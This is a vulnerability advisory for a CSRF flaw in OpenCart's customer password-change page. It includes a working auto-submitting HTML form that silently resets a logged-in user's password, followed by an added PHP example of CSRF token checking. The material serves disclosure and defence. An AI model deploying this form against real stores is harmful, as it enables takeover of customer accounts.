Opencart-v3-0-3-0: CSRF vulnerability in user password change

Software Link: https://github.com/opencart/opencart/
Date: 06.28.2018
Exploit Author: CK01
Version: <= V3-0-3-0

0x00 Vulnerability analysis

     The user token is not verified when the password is changed, so a CSRF request can modify the user's password.

 /upload/catalog/controller/account/password.php



0x01 Exploit

Save the following exploit as an HTML file and open it in a browser to run it.

<html>
  <body>
    <form id="post123" name="post123" action="http://192.168.0.46/opencart/index.php?route=account/password&language=en-gb" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="password" value="CK01ck01" />
      <input type="hidden" name="confirm" value="CK01ck01" />
      <script>
        document.getElementById('post123').submit();
      </script>
    </form>
  </body>
</html>

The end user's password will be changed, and the user will then run into problems when modifying their data.
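
The token check that the analysis says is missing, as an added example in plain PHP; it is not OpenCart's code or the exploit author's. The function names, the `csrf_token` field and the sample requests are assumptions made for illustration.

```php
<?php
// Added example, not OpenCart code. All function and field names are hypothetical.
// Issue one random token per session; the password form embeds it in a hidden field.
function csrf_issue_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// A request passes only if it is a POST carrying the token stored in the session.
function csrf_request_is_valid(array $session, string $method, array $post): bool
{
    if ($method !== 'POST') {
        return false;
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    if (!is_string($supplied) || $expected === '' || $supplied === '') {
        return false;
    }
    return hash_equals($expected, $supplied); // constant-time comparison
}

// Password-change handler: reject before touching the account if the check fails.
function handle_password_change(array &$session, string $method, array $post): string
{
    if (!csrf_request_is_valid($session, $method, $post)) {
        return 'rejected: missing or invalid CSRF token';
    }
    $password = $post['password'] ?? '';
    if (!is_string($password) || $password === '' || $password !== ($post['confirm'] ?? null)) {
        return 'rejected: password and confirmation do not match';
    }
    unset($session['csrf_token']); // single use; the next form render issues a new one
    return 'accepted: password would be updated here';
}

// Constructed sample requests. $session stands in for $_SESSION.
$session = ['customer_id' => 1];
$token   = csrf_issue_token($session);
// Cross-site post shaped like the form above: password and confirm only, no token.
$forged = ['password' => 'x', 'confirm' => 'x'];
echo handle_password_change($session, 'POST', $forged), PHP_EOL;
// Same-site post from the real form, which includes the hidden token field.
$legit = ['password' => 'new-pass', 'confirm' => 'new-pass', 'csrf_token' => $token];
echo handle_password_change($session, 'POST', $legit), PHP_EOL;
```

A cross-site page cannot read the victim's session token, so the auto-submitted form is rejected while the site's own form, which embeds the token, still works.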




